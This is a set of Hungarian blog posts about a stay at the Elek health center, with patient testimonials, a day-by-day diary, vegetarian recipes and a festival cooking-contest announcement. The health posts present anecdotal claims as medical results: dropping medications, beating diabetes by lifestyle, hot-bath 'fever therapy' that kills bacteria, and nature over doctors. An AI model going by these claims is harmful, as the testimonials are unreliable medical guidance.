Ma már úgy látom - visszatekintve a történtekre, hogy a jó Isten kiemelte engem abból a munkából. Szervezetem is belebetegedett az utolsó néhány évbe, és az elbocsátás körülményeibe. (Bírósági ítélet során anyagi kártérítést kaptam, de ezzel az igazság nem állt helyre.) Mindenről lemondva, halni készült állapotba végül elmentem Elekre 2010 szeptemberében, ahol hatalmas csoda történt az életemben.
Az egészséges életmódot, elveket addig is alkalmazni próbáltam, de nem volt igazán eredményes. Ott viszont már az első napon meleg szeretettel teli közösségbe csöppentem. Ahogy teltek a napok, egyre jobban kezdtem érezni magamat. A 8 alapelv (new start) gyakorlatát valósíthattam meg az életemben. Éreztem, ahogy visszatér belém az erő.
Kezelőmmel elsétáltunk egy alkalommal a román határ felé. Csöndesen beszélgettünk, sétáltunk, a határnál leheveredtünk a fűbe, néztük a kéklő eget, és éreztem, hogy erőre kapok, hogy a jó Isten ott van, velem van és célja van az életemmel.
Ez volt az a pont, amikor úgy éreztem, minden megfordult.
Hétvégére jobbak lettek a labor eredményeim. Hazatéréskor pedig elláttak jó tanácsokkal. 10.000 lépés program - vagyis napi 10.000 lépést kellett naponta gyalogolnom.
Lakhelyemen minden délben meglátogattam és megetettem édesanyámat (98) az idősotthonban. Oda is gyalog mentem, és haza is. Ezzel a 10.000 lépést biztos teljesítettem minden nap. A mozgás nagyon sokat segített. Az alvásánál is éreztem, ez jótékonyan hat. Jólesően el is fáradtam, amikor hazaérkeztem. Éreztem, hogy a vérkeringésem is beindult. Elkezdett megerősödni a szívizomzat a rendszeres, de mégis könnyű mozgás által. Másfél évig mindennap, míg élt az édesanyám, megtettem ezt a távolságot. Függetlenül hidegtől vagy hőségtől. Édesanyám halálát követően már a rendszeresség csökkent, de huzamosabb ideig ezt követően is éreztem a belső órámat, ahogy jelez, itt az idő, indulj a sétára. Napjainkban ahova csak tudok, gyalog megyek. Érzem, a szokásos mozgás hiányzik. Amikor Eleken vagyok, ott szintén jelen van az életemben, hiszen a programba van építve. Lelkileg is feldobott a mindenkori testgyakorlat, sőt pár hónap múlva a rettenetes fáradtságom is megszűnt. Pedig nehéz volt erőt venni magamon, hogy gyalog elinduljak, mikor mehettem volna busszal is. Az első hónapokban tényleg nagyon nehéz volt, de idővel szokássá vált, és meghatározta életvitelemet, napjaimat. Boldogságot is adott.
10 féle gyógyszert szedtem, amikor Elekre megérkeztem 2010 szeptemberében. Turnus végén, Elekről eljövet, már csak két gyógyszer maradt meg az életemben. Ez a két gyógyszer közül az egyik - vérsűrűség hígító - mivel agyi infarktusom volt, és az alvászavarra kapott gyógyszer a másik. Emellett a belgyógyász által felírt gyógyszereket, mint például a cukorbetegségére kapott metforált is teljesen sikerült elhagynom még az eleki tartózkodásom alatt. Pedig nem folytattam speciális - cukorbeteg diétát. Egyszerűen csak a new start életvezetést éltem, jobban mondva kezdtem el megélni. Mindenre kíváncsi voltam. Leírtam a cukorbetegek speciális diétáját és haza érkezve ezt folytattam 4 hétig. A diétát néhány napos böjttel indítottam. De egy-két nap is elég lett volna. Azonban belül is éreztem, szükségem van erre.
Eleken az eltöltött egy hét alatt 2-3 kg-t fogytam. Mindez annak volt köszönhető, hogy a vacsorákat teljesen kiiktattam életemből. A sok séta is közre játszott és természetesen a nyers ételek, valamint az őrölt lenmag rendszeres székletet biztosított. Annak ellenére, hogy bőséges reggeliben és ebédben volt részem minden nap, mégis az életmód változtatás már egy hét alatt 2-3 kg-val kevesebb súlyt eredményezett.
Azzal a jó tanáccsal indítottak még útnak az egy hetes turnus végén, hogy fogynom is kell még. A tanácsokat - elhatároztam - be fogom tartani. Éreztem a jó Istentől kapott erőt is, és így időközben megfordultak azok a dolgok, amik a lelki halál állapotához vezettek.
Az alatt a 4 hét alatt, amíg a javasolt ,,cukorbetegek számára ajánlott diétát folytattam, 5 kg-val lettem kevesebb. Attól kezdve szépen lassan kéthavonta 1 kg-tól sikerül megszabadulnom. Legutóbb 76 kg voltam Eleken (legelső alkalommal 98kg!!). Az ideális testsúlyt szeretném elérni, azt megtartani, és tudom, a szokásommá vált új életmóddal sikerülni is fog. (Kitűzött cél a 68-70 kg.)
Az utolsó gyógyszert idén februárban (2012) sikerült letennem. Pszichiátrián is megbeszéltük, hogy elhagyom a gyógyszert. Nem egyik napról a másikra történt ez, hanem az adag folyamatos csökkentésével. Természetesen mindkét utolsó gyógyszer, éppúgy, mint a többi 8 tabletta elhagyását orvosi konzultáció előzte meg. Isten segítsége mellett az életmód változtatásának köszönhettem, hogy eljutottam idáig. Jelenleg elmúltam 60 éves, felmenőim mind cukorbetegség következményei miatt hunytak el, súlyos betegségekben, és bár nálam is kialakult, mégis sikerült legyőznöm speciális diétával, mozgással, a 8 alapelv életszokássá alakításával.
Laboreredményeim ezt követően teljesen jók lettek. Az ott (Eleken) megszületett hála azóta is élni tanít és segít mind a mai napig. A testi-lelki harmónia, amit ebben a közösségben egyszerű kis módszerekkel megélhettem, továbblendített napról napra az élet nehézségein.
Kérdésemre, hogyan lett kezelő az Eleki Egészségközpontban, az alábbi választ adta:
,,Először is nagyon tetszett a légkör, amit megtapasztaltam már az első nap Elekre érkezve. Annyira más volt a közeg, mint az elmúlt 20 év túlpörgetett munkája. Amíg betegként először ellenszenvvel mentem oda, második, harmadik napra teljesen megváltozott a beállítódásom. Jól esett együttműködni és azt csinálni, amit ott előírtak az egészségem érdekében. Végére azt vettem észre, mintha nem történt volna velem semmi, de mégis megváltozott bennem minden.
A harmónia, rend, belső és külső szervezettség a hatalmába kerített. Minden elkezdett bennem jól működni. Más táplálkozás, a mozgás, a lelki dolgok hatása által apránként oda jutottam, hogy jól vagyok, megbékéltem a világgal. Ezt csodás, nagy változásnak éreztem magamban. Ha ez velem megtörténhet, akkor szeretném, ha én is ebben más számára segítség lehetnék. Szeretném, ha más is átélhetne hasonló jót. Óvatosan, semmit nem remélve megkérdeztem, hogy kaphatnék-e esélyt a kezelői feladatok végzésére.
A központ vezetője és orvosa is örömmel fogadta ajánlkozásomat. Ezt követően átestem egy oktatáson (2 hét) majd valaki mellé beosztottak tanulni, mint ,,másodkezelő. Ezután már gyakorlatban szereztem a tapasztalatokat. Végül önállóan kezdtem meg a következő turnuson a kezelést.
Turnusról turnusra egyre jobb sikereket éltem át. Megszerettem azokat, akiket kezelhettem. A megváltozott életmóddal hatalmasat lehet segíteni, nem csak a magam életében tapasztalom már meg. Azóta is kapcsolatban vagyunk a kezelt vendégekkel, a kialakult bizalom mai napig megvan. Jó érzés így segíteni.
Most ugyanúgy tudok gondoskodni, mint 20 éven át, csak nem gyerekekről, hanem gyógyulni vágyó vendégekről. Öröm és kihívás számomra, hogy minden mozdulatra, rezdülésre oda kell figyelni, és meg kell találni, hol az a távolság, ami megfelelő köztem és a kezelt ember között. Volt, aki igényelte, hogy reggeltől estig vele legyek, más pedig függetlenebb életet próbál(t) ott élni.
Egyre jobban gyönyörködöm a módszerekben. Ahogy a jó Isten adta a gyógymódokat, egymásra épülve, megteremtve azok gyógyító erejét.
Szemünk láttára omlik össze az egészségügy napjainkban. Egy ilyen egészségközpont által azonban megnyílik egy olcsóbb, egyszerűbb lehetőség a gyógyulásra, az otthon is használható gyógymódok elsajátítására.
Ámulok a bölcsességen, hogy ebben munkálkodni tudok. Egyre erősödik bennem a felismerés, hogy ez az, amit mindenki megpróbálhat, ártani nem fog. Ez az életmód változtatás sokkal egyszerűbbé teszi az életet. Apró csodák, amikben mindenkinek része lehet, csak rá kell szánnunk magunkat.
Úgy mentem Elekre, hogy ártani nem fog, bár kicsit ellenszenves volt mindenki a személyzet közül. Nem tudtam elhinni, hogy létezik ilyen szeretetteljes közeg, de két-három nap múlva, már éreztem, hogy nálam is működik, ekkor megváltozott a véleményem.
Szeretném, ha ezt mindenki megtapasztalhatná, hogy lehet jobban is élni. Nem drágábban, jobban, egészségesebben.
Valóságos grízpuding és fantáziavilág VKF! 50 (Ehető virágok)
? Kislányoknak, romantikusoknak, álmodozókank vagy akár két lábbal a földön járóknak, gyermeki lelkűeknek, vidámaknak és szomorúaknak, a kert törpéinek, természeti lényeknek és tündéreknek, és bárkinek aki szereti :) ? ! Jubileumi 50. fordulójához érkezett a VKF! vagyis a Vigyázz, Kész, Főzz! nevű játék melyet Selectfood hirdetett meg itt. Témája: Ehető virágok. Ha csak a receptet szeretnéd olvasni kérlek keresd a kiemelt RECEPT feliratot, írok még előtte mindenfélét és még lelkizem is egy kicsit. Ismét olyan téma és alkalom amit megint csak úgy éreztem kár lenne kihagyni. Történt ez az életemnek egy olyan periódusában amikor félretettem a főzést (szinte csak akkor főztem, ha itthon volt Csaba), ételt májusban fotóztam utoljára. Az ok nem a kánikula volt, bár az is rátett egy lapáttal, hanem, hogy minden eddiginél nyitottabbá vált a lelkem és a szellemem az asztrológiára, no nem arra a fajta ezobizniszes, csacskaságra (elnézést) ami általában a médiákban megy, hanem arra ami az ön- és emberismeret elmélyítésében lehet segítségünkre. Minden szabadidőmet az e területen végzett kutatásra és tanulásra fordítottam, teljes lényemmel belevetettem magam, óriási kaland.... aztán ha majd ha az az űr amit ezerrel töltök nem feszít már annyira, biztosan megint visszatérek a konyhai örömökhöz is mindaddig míg valami újra nem jön.... Az 50. VKF!-en való részvétel kedvéért viszont az asztrokalandot tettem félre egy kis időre. Volt egy kikötésem magamnak: Pénzt most nem költök. Legalábbis olyasmire nem amiért reletíve mélyebben a zsebünkbe kellett volna nyúlni (június) hónap végefelé. A rózsák elvirágzása rohamosan beindult (a biztonság kedvéért két maroknyit tettem a fagyóba), a körömvirágot is az utolsó pillanatban szedtem meg... ugyan több hét is a rendelkezésünkre állt, nem minden virág várt. A zsebbenyúlós ötletem helyett itthon meglévő alapanyagokból dolgoztam. Már 22 nappal ezelőtt kész lett a puding és a fotók. Olyan lelkes voltam és olyan speckó hangulatban, viszont olyan sok idő eltelt azóta, annyi minden történt, és annyira más hangulatban vagyok. Jó lenne újra ráhangolódni, hogy írásban is meg tudjam teremteni azt az atmoszférát. Ez az étel a romantikus és egyben a gyermeki énünket érintheti meg. Mindkettőt, a romantikát is abban az értelemben értem, ami kiszakít a szürke, vagy problémás hétköznapokból, ahonnan elvágyódunk egy színesebb, békésebb, boldogabb világba. Legalább is mi felnőttek. Én ezt az ételt a képzeletem világában egy 8 év körüli kislánynak is készítettem (és még másoknak). Persze végig tudtam, hogy ez nem a valóság, ez egy játék volt, de tudjuk minden játék valahol nagyon is komoly. Az a kislány az én belső gyermeki énem is lehetett. Mégis képzeletben inkább anya voltam és a saját (képzeletbeli) kislányomat leptem meg. Egy olyan kislányt aki még szeret mesebeli királylánynak öltözni, aki még ösztönösen látja mindenben a szépet, és akinek a szeretetemmel ilyen formán is oly könnyű vidámságot, melegséget, varászlatos pillanatokat szerezni. Persze hasonlót nap mint nap megélek a valóságban is például amikor (most nem a varázslatos pillanat okozásra gondolok) a macskáknak friss vizet adok, vagy amikor a kedvesemnek készítek ételt, és még azt az egy szem olívabogyót is a tetejére szívem minden szeretetével és jóindulatával helyezem oda. Ez a virágos puding volt az ami képzeletben ennyire elvitt, az a bűnös puding, de nem, nem hárítok, le sem tagadhatnám, hogy nagyon szeretnék majd gyermeket.(Asztrósok értik: a felszálló holdcsomópontom az ötödik házban, meg más is...) Azt írtam: aki még ösztönösen látja mindenben a szépet, na jó ez így némileg túlzás, mert nem mindig mindenben, tudom egy 8 éves embernek már van egója, de bármilyen is legyen a gyermeked a gyermekedet csak szereted... Fantázia és álmok ide vagy oda, a józan parszti ész fontos. Vajon hallgatok én arra amikor ennyire kitárulkozom? RECEPT: SÁRGA: körömvirág és reszelt citromhéj RÓZSASZÍN: rózsa és málna BARNA: levendula és kakaó ZÖLD: fodormenta FEHÉR: kókuszreszelék két főre kb. 2-3 maroknyi a virágokból - a körömvirágnak és a rózsának csak a szirma-, a levendulából fele-harmada, vagy ízlés szerint. Megfőztem a kb. bögrényi búzadarát a kb. 4-5- szörös mennyiségű (növényi)tejben, ízlés szerint édesítettem, majd öt részre osztottam, hagytam hűlni, és külön-külön összeturmikszoltam a virágokkal, illetve virágszirmokkal és az egyéb ízesítőkkel, színezőkkel. A fodormentásba tettem egy kis citromlevet, hogy ne barnuljon meg és egy keveset a körömvirágból is, ami az ízét nem vitte el, a színe viszont melegebb lett. Mindenhez ami sárga mindig teszek kurkumát, a körömvirágosnál most sem bírtam megállni, tényleg csak keveset. Tapasztalatom, hogy egy ponton túl már barnás árnyalatot okozhat. Elhagyható. A tányérra kiskanállal, késsel és fogvájó segítségével vittem fel az alakzatokat. Végül díszítettem még körömvirággal, levendulával, (lila) bazsalikom virágjával, málnával, menta levéllel. Behűtve finomabb. --------- Szép képek innen: http://www.josephinewall.co.uk/index.html
Vegetáriánus Fesztivál és Főzőverseny
2012. július 19. Zizi kalandjai
A korábbi évekhez hasonlóan az Egészség-Vár Alapítvány idén augusztusban megint megrendezi a Vegetáriánus Fesztivált. A hagyományaikhoz híven sok színes és érdekes programmal, fellépőkkel, kiállítókkal, és finomságokkal várnak minden kedves érdeklődőt. A rendezvény látogatása ingyenes, a helyszín pedig a X. kerületi Kőrösi Csoma Sándor Kőbányai Kulturális Központ.
Időpont: 2012. augusztus 25-26.
Részletes program: itt.
A fesztivál keretében újra megrendezik a főzőversenyt. Az a megtiszteltetés ért, hogy megint felkértek zsüritagnak. Izgalmasak a nyeremények, szóval érdemes nevezni olyanoknak is, akik nem vegetáriánusok. A tavalyi versenyt Ami nyerte meg, fantasztikus ételeivel igazán elkápráztatta a zsürit. A többi versenyző is kitett magáért a tálalást és ízeket illetően.
Íme a verseny felhívás...
Az emberek nagyon fontosnak tartják a tulajdonukat. Csak a legjobb olajat töltik a kocsijukba, gyönyörű bútorokat vásárolnak, miközben a legolcsóbb, legrosszabb minőségű ételt eszik. Mert a mai ember néha többre becsüli a tárgyait, mint a tulajdon testét vagy az életét. Puszta mechanikai szempontból az emberi test, mint tudjuk, bámulatos, nincs hozzá fogható a készáruk világában. Már az ésszerűség kedvéért is jobban kellene törődnünk vele, mint a többi anyagi dologgal. (Paul Pitchford - Gyógyító táplálkozás)
A fenti mottónkkal ezúton szeretnénk meghirdetni a XVI. Vegetáriánus Fesztivál főzőversenyét. Ha szeretsz otthon főzni, új ételeket kitalálni, szeretnéd megosztani főzőtudományodat másokkal is, és ha van egy jó recepted, akkor most van itt az ideje, hogy megoszd velünk. Szeretnénk, ha igazán egyedi, ízletes receptek kerülnének majd bemutatásra.
A verseny menete:
A versenyben bárki részt vehet, aki nem foglalkozik hivatásszerűen a főzéssel. Fontos: legyél lelkes és kreatív. Először is 2012. augusztus 12-ig küldd el a recepteket, amivel nevezni szeretnél a fozoverseny@egeszsegvar.hu email címre. Mi a 20 legígéretesebbet meghívjuk a Vegetáriánus Fesztiválra, ekkor már a készételt kell elhoznod magaddal.
A második kör a fesztivál másnapján, augusztus 26-án, vasárnap, reggel 10 órakor kezdődik. A beválogatott 20 étel ezen a napon kerül bemutatásra a Hogyan készül? standon. Kérjük, hogy az ételekből 2-2 adagot hozz, és egyszer használatos (műanyag vagy papír) tányérokra, tálakra tálald, mivel a tálalásra felhasznált eszközöket nem áll módunkban visszaadni. Eredményhirdetés és díjátadás augusztus 26-án lesz.
Mivel lehet nevezni?
A menü 2 fogásos, lakto vegetáriánus* vagy vegán *legyen:
1. Egy főétel körettel vagy egytálétel.
2. Egy saláta vagy édesség (csak egyik a kettő közül).
* A lakto vegetáriánus ételek az állati eredetű alapanyagok közül legfeljebb tejet, tejterméket (sajt, vaj, tej stb.) tartalmaznak, tehát tojást, halat, szárnyasokat nem. A vegán ételek kizárólag növényi eredetű alapanyagokat tartalmaznak.
Ki nevezhet?
Bárki, aki nem hivatásos szakács, vagy más vendéglátásban dolgozó ember. Tehát mindenki, aki nem hivatásszerűen foglalkozik főzéssel.
Hogyan lehet nevezni?
2012. augusztus 12-ig küldd el a fozoverseny@egeszsegvar.hu email címre jelentkezésed, elérhetőségeidet és a recepteket, amiket szeretnél megfőzni, sütni.
Kikből áll a zsűri?
Dóka Róbert (a VegaFOOD ügyvezetője)
Ludassy Katalin (Bioverzum Kft.)
Nagy Zita (gasztroblogger)
Lakatos Gyula (Civil Rádió a Kanál forradalma c. műsor vezető szerkesztője)
Jakus Orsolya (a fesztivált szervező Egészség-vár Alapítvány elnöke)
Joós Tamás (Kőrösi Csoma Sándor Kőbányai Kulturális Központ igazgatója)
A zsűri több szempont szerint fog értékelni:
- illat
- látvány, fantázia
- recept különlegessége, eltérése a megszokottól
- megfelelő ételtársítások, egészséges alapanyagok
- és természetesen, ami a legfontosabb az ÍZ
Mik lesznek a nyeremények?
Az első 3 helyezettet tárgyi nyereményekkel és oklevéllel jutalmazzuk:
1. helyezett: egy kétszemélyes hétvége teljes ellátással a Bioenergetic Könyvkiadó piliscsabai ökopanziójában;
2. helyezett: értékes nyeremények
3. helyezett: értékes nyeremények
A 4-10. helyezettet oklevéllel ismerjük el.
A nyertesek lehetőséget kapnak a Kanál forradalma rádió műsorban megismertetni receptjeiket!
Jelentkezésed és esetleges kérdéseid a fozoverseny@egeszsegvar.hu e-mail címre várjuk!
a Vegetáriánus Fesztivál szervezői
Zöldséges árpagyöngy leves
2012. július 19. Vegetáriánus receptek
Ellentétben más, hasonló receptekkel itt a gerslit nem áztatjuk, viszont pirítjuk. Szárazon. Édeskés, enyhén füstös ízt ad majd a levesnek.
Hozzávalók:
- ½ bögre árpagyöngy (gersli)
- 1,5 ek vaj vagy margarin
- 1 fej hagyma
- 1 csipet bors
- 1,5 l víz
- 1 tk só
- 2 db burgonya
- 3 szál sárgarépa
- 2 szál petrezselyem
- 2 ek petrezselyemzöld
A gerslit egy serpenyőben zsiradék nélkül átpirítjuk. A hagymát, a burgonyát, a répát és a petrezselymet megtisztítjuk és fél centis kockákra vagdaljuk. Egy fazékban felolvasztjuk a vajat, majd üvegesre pirítjuk benne a hagymát. Hozzáadjuk a borsot és a gerslit, átkavarjuk, majd megsózzuk és felöntjük a vízzel. Addig főzzük, míg a gersli puhulni nem kezd. Ekkor beletesszük a zöldségeket és tovább főzzük, míg a zöldségek meg nem puhulnak. Elzárjuk és belekeverjük a petrezselyemzöldet.
Ha esetleg nem vagyunk elégedettek a gersli állagával, akkor a fedőt konyharuhával letakarva hagyjuk még párolódni.
Bliszkó Viktor
A várva várt quinoa fasírt
2012. július 18. Zizi kalandjai
Szegény quinoa fasírt érkezését jó régen bejelentettem már, aztán a forró időjárásnak köszönhetően egy párszor elhalasztottam. Most viszont itt vannak és mosolyognak. :) Ha ránézek az első fotóra, felidézem az ízüket és elindul a nyálelválasztásom. Ropogósak, fűszeresek, igazi fasírtok. Újra és újra kérek belőlük.
Készítettem már néhány vega fasírtot és van még jó pár a tarsolyomban. Szeretek kísérletezni, új dolgokat kipróbálni és bemutatni, hogy van mivel helyettesíteni a húsokból készült fasírtokat. Ezeket egy kora tavaszi kockásplédes szentendrei piknikre készítettem. Teljeskiörlésű kenyérszeleteket kentünk meg dijoni mustárral, ráhelyeztünk egy-egy salátalevelet, majd jöttek a fasírtok, egy kis sajt és csíra vagy savanyú káposzta a tetejére. Mondanom sem kell mennyei. Ízorgia a köbön! Pirított, ropogós hamburgerzsemlékbe is tökéletes.
Recept a Super Natural Every Day szakácskönyvből.
Quinoa fasírt
Hozzávalók (kb. 24 db-hoz, persze függ attól, hogy mekkorára formázzuk):
- 170 g quinoa
- 1 db tojás
- 1 fej vöröshagyma, felaprítva
- 2 gerezd fokhagyma, felaprítva
- 15 g petrezselyem, felaprítva
- 10 g parmezán, reszelve
- 50 g zsemlemorzsa, plusz több, ha szükséges a megfelelő állaghoz
- tengeri só, feketebors
- olívaolaj
A quinoat főzzük meg kétszeres mennyiségű vízben és tegyük félre kihűlni.
Egy tálban keverjük össze a főtt quinoát a tojással. Adjuk hozzá a petrezselymet, vöröshagymát, fokhagymát és a sajtot. Sózzuk, borsozzuk ízlés szerint. Keverjük bele a zsemlemorzsát. Hagyjuk állni 5-10 percet, hogy a zsemlemorzsa magába szívja a nedvességet és jól formázható masszát kapjunk. (Ha szükséges, adjunk még hozzá egy kevés zsemlemorzsát.)
Pingpong labda nagyságú golyókat formázunk, ezeket kilapítjuk a tenyerünkkel és egy tálcára tesszük. Teflonserpenyőben hevítsünk egy-két evőkanál olívaolajat közepes láng felett, majd tegyük bele a fasírtokat. Süssük egyik oldalukon 7-10 percig, amíg szép barnák lesznek; majd fordítsuk meg és a másik oldalukat is süssük ropogósra. A maradék fasírtokat is ugyanígy süssük ki.
Ha nem fogy el egyszerre, hűtőben tárolható dobozban kb. 2-3 napig.
Eleki Egészségközpont 10. rész
10. nap
Az előző napi kiválóságok (gabona és gyümölcs fogyasztása, lázterápia) után ezen a napon ismét önsanyargatásosabb 24 óra várt rám. Mivel a 36 órás böjt számomra nehezebben volt tűrhető - gondolok itt arra, hogy előbbi nap 13 órakor ebédeltem és a második nap reggel 8 órakor kaptam reggelit - így megegyeztünk a doktornénivel:) és a kezelőmmel, hogy a 36 órát 24 órára csökkentjük, vagyis reggeli, majd másnap ismét reggeli.
10. napon tehát megkezdtem a böjtöt. Reggelire elfogyasztottam a salátám utoljára és napközben már csak vizet ittam. Ásványvizet, mivel továbbra is hányingerem volt az eleki tisztított víztől. Teát is ihattam volna, de nem kívántam. Nem esett jól.
Ezen a napon szerintem jobban bírtam a "nem evés" tényét, mint az előző alkalommal. Eleve a tudat, hogy 12 órával kevesebb ételmegvonás vár rám, sokkal jobb érzetet adott nekem. Bár amikor a többiek az ebéddel végeztek és megtudtam, hogy töltött paprika volt... bizony elkeseredtem egy picit. Aztán eszembe jutott, hogy még mindig jobban járok, mint egy másik "sorstársam", aki néhány napig barna rizst és körtét evett reggelire is és ebédre is. Nos vele is készítettem egy rövid "interjút". A 61 éves korát meghazudtoló üzletasszony egyik fiával érkezett. Az alábbiakról tett bizonyságot szavaival nekem:
Elekre érkezése előtt mindkét könyökénél ekcémás jellegű kiütésekkel volt teli a bőre. A turnust megelőzően bizony húst is fogyasztottak - és persze mindenféle állati eredetű ételt.
Elsőnek először is elmondta, hogy állandó derékfájása elmúlt. Ízületi betegsége szintén a múlté. Könyökén a bőr sokkal szebb, mint, amikor ideérkezett, kis híján meggyógyult a kiütésekből. Az ekcémát zabpehelylisztes vízzel fürdették naponta legalább 20 percig, de a feketeszenes pakolást is kipróbálták a bőrén. Kiütéseinek már csak a nyoma látható. Fittebbnek, energikusabbnak érzi magát annak ellenére, hogy kávét az eleki időszak alatt nem fogyasztott, sőt sikerült néhány kilótól is megszabadulnia. Igaz, esténként mindig sétált fiával egy jó 40-60 percet. Az állandó de könnyed mozgás pedig hozzásegítette a fogyáshoz és ahhoz is, hogy a fentebb ecsetelt eredményeket elérje.
Fia, aki mellesleg csapatunkban a legfiatalabb, a vendégek között az egyetlen férfi volt. (Mint kezelőmtől megtudtam, más turnusokon több férfi is szokott lenni, legutóbb pl. 3 volt a tízből.) Súlyos asztmával érkezett. Testnevelés órákon futásból felmentve volt, mivel egy alkalommal futás után elájult. Pedig nem nádszál vékony gyengécske fiúnak nézett ki. Abszolút jó kondiban lévő srácnak tűnt, amikor az ember ránézett. Gőzpakolásokat kapott tüdejére. Valamint lázterápiával is gyógyították. Emellett hideg-meleg vizes arcfürdőben volt része (búvárpipával oldják meg a közbeni szabad lélegzést). Ez utóbbi kezelést követően nagyon sok papír zsebkendőt használt el, ugyanis rengeteg lerakódás feljött az arcüregéből. Különben szobatársam is kapott ilyen kezelést és hasonló tapasztalatot mondott el.
Legfiatalabb tagunk ide érkezve a gerincferdülése következtében nem tudott hajolni, de a mindennapi kemény gyógytorna, amit kezelője tartott, meghozta a hatását és sokkal hajlékonyabb a dereka. A hús és állati termékek fogyasztását édesanyjával közösen feladták. Erőt és kitartást kívánok nekik a változtatás megtartásához a fejlődéshez, a new start életmód folytatásához!
Az édesanyja, aki a tapasztalatokat elmondta úgy gondolja, hogy betegségeinkből saját magunk erőfeszítései által kell kijönnünk. Ha valakinek betegsége van, vagy nem foglalkozik vele, vagy rohan az orvoshoz, pedig a legtöbb problémára a megoldás a természetből kínálkozik egyrészt gyógynövények, másrészt a természetes gyógymódok, terápiák által. Örül, hogy ezekből megismerhetett és elsajátíthatott egy részt.
Eleki Egészségközpont 9. rész
9. nap
Gondolataimban már holtpont volt ez a nap, egyre jobban hiányzott az otthon és a férjem. Na meg egy kis kaja a régi napokból, mint pl. egy töltött paprika (persze hús nélkül). Hát igen, töltött paprika és zöldborsó főzelék. Amióta az eszemet tudom ez a két kedvencem. De nem is nagyon akarok már a vágyakozásaimról írni, mert annál rosszabb, amikor összefut a számban a nyál, és nem kap rá választ, legfeljebb egy finomabb pofont.
Szóval a turnus is már a végét járta, és nekem pedig lehetőségem volt ezen a napon gyümölcsöt és gabonát enni. Minden nap vártam, hogy a többi néhány ember, aki az ,,átlag menüt fogyasztja, mikor kap végre árpát (gerslit) reggelire. Én nagyon szeretem. Ráadásul a melegben a szervezet számára hűsítő hatással bír, persze nem úgy, mint egy jégkrém vagy fagylalt. Arról nem beszélve, hogy a bélrendszert is megmozgatja, s akinek szorulása van, egyen egy kevés főtt árpát és megoldódik problémája. Mivel napok óta zöldségeken éltem, és nem annyit ettem, mint hajdan, annyi apró problémám volt, hogy míg máskor akár 2-3 alkalommal is sikerült könnyítenem ,,terhemen, úgy most az egy épp, hogy összejött. De az árpa rendbe tett. Azóta ismét megfelelően működik a ,,tisztulásom.
Gondolom már rájöttetek, hogy gabonás napomon épp árpa volt reggelire. Darált mákkal és barackkal, valamint gyümölcs volt hozzá. Először kivégeztem a gyümiket, majd az árpás reggelit. Finom volt. Egyesek szerint alig volt édes íze, nekem azonban Kánaán volt. Se túl édes, se kevésbé. Pont megfelelő. Ebédre az asztalomra pedig barnarizses rizibizi diófasírttal került.
Ebben a napban mégis nem a második gabonanapom volt a különleges, hanem sokkal inkább a délutáni kezelésem. Eddig javarészt gőzpakolást kaptam, olykor azt követően egy kis hátmasszázst, illetve a kezeimen korábban (Elekre jövetel előtt) megjelent apró kiütéseimet zabpehelylisztes vizes keverékben történt áztatással kezeltük, majd olíva olajban elkevert mentacseppekkel kentem be a kiszáradt bőrfelületet. Most azonban egészen más terápiát próbálhattam ki, ez pedig a lázterápia volt. A következők szerint lett végrehajtva:
Kedves Kezelőm egy kád forró vizet készített számomra elő, míg átöltöztem fürdőruhába. A víz 43 C fokos volt. Megpróbáltam beszállni, de túl forró volt, így lehűtötte 41 C fokra, s ezt már nagyon jól elbírtam. Mielőtt beléptem, megmérte a hőmérsékletem. Meglepett, hogy 37 C fok volt, bár iszonyú meleg volt az időjárás, és előtte épp mozogtam aktívabban rövid ideig. Mikor a vízbe ültem, a mellkasomra terített egy frottír törölközőt és elkezdte locsolni a kád vizével a felső testemet. Ezzel emelte a belső hőmet. 38,8-ig sikerült feltornázni. Ezt követően 38,7 fokon tartottuk legalább 30 percig. Mindeközben 5-10 percenként mérte a lázamat és borogatást kaptam tőle a fejemre és a nyakamra. Sajnos nem mindenki bírja ki sokáig, feladja, így aztán nincs meg a kellő hatás a szervezetben a bacik elpusztítására. Örültem, hogy bírtam mindvégig. Mintha a betegség megártott volna, olyan humoros mondatokat szóltam miközben beszélgettünk a lázterápia alatt, hogy csodálkoztam magamon. Pedig nem álltam alkoholos befolyásoltság alatt. A fél óra leteltével pedig leengedte a vizet a kádból, átdörzsölte hideg vizes törölközővel a lábamat, majd enyhe hideg testzuhany következett. Bebugyolált egy óriási lepedőbe (akárcsak az anyukák a gyerekeket), felmentünk a szobába és az általa előre elkészített ,,melegágyba kellett lefeküdnöm. Melegágyon azt értem, hogy 2 pokróccal is betakart - alul, felül, oldalt, nyakig mindenhol beborított. A fejemet pedig törölközőbe csavarta. Így lettem kényszerpihenőre rakva. 45 percig. Közben csendesen, figyelmesen borogatta a homlokom. 37,6-tal kerültem az ágyba. Majd felment 37,8-ra, ezért kidugtam a takarásból a két karomat. Mindeközben szívószál segítségével vízzel is itatott. Az egész műveletet élveztem, visszatekintve szívesen kipróbálnám újra és újra, de amint látható, közel 2 órás idő szükséges az elvégzéséhez.
A 45 perc letelte után a takarókat szép lassan levette rólam, és lassan visszaállt a normál hőmérsékletre a testem. Utána fürödtem, hajat mostam és úgy felfrissültem, mint szárazság utáni záporban a termőföld.
A magáról a fürdővizes lázterápiáról mellékeltem fentebb egy képet. Kezelőmhöz ketten tartoztunk, a másik kezelt vendégtől kértem engedélyt, hogy arc nélkül készíthessek képet róla. Így minden kedves olvasó jobban el tudja képzelni a fürdővizes lázterápiás kezelést.
Eleki tartózkodásom történeteinek hamarosan vége, de még tartogatok egy-két érdekes beszámolót.
Eleki Egészségközpont 8. rész
8. nap
Tovább folytathattam a hüvelyes ételek fogyasztását a hétvége elmúltával. Nagyon örültem az ebédnek (reggelire továbbra is zöldségből - paprika, paradicsom, lilahagyma, saláta, - készített salátát kaptam). Nem akármi jutott részemül, mint majonézes saláta!!! Persze nem majonézzel, hanem babonézzel készült. (ennek a receptjét később otthon elkészítve, fotózva megosztom - számomra nem vadi új dolog, de a korábbiakban preferáltam íz miatt a mindenki által megszokott majonézes salátát. Itt azonban átállt az ízlelő érzékem, és már az egészségesebb formát kívánom.) Visszatérve az ebédhez, borsó és csicseriborsóból készült a majonézes salátám. Hmmmm, nagyon jót ettem belőle és zseniálisan jól laktam. Voltak, akik aznap irigyeltek is, mivel nekik pizza volt (sajt nélkül, szép barna tésztával - nekem bejött volna, de igaz, ami igaz, jobban örültem a majonézes salátának).
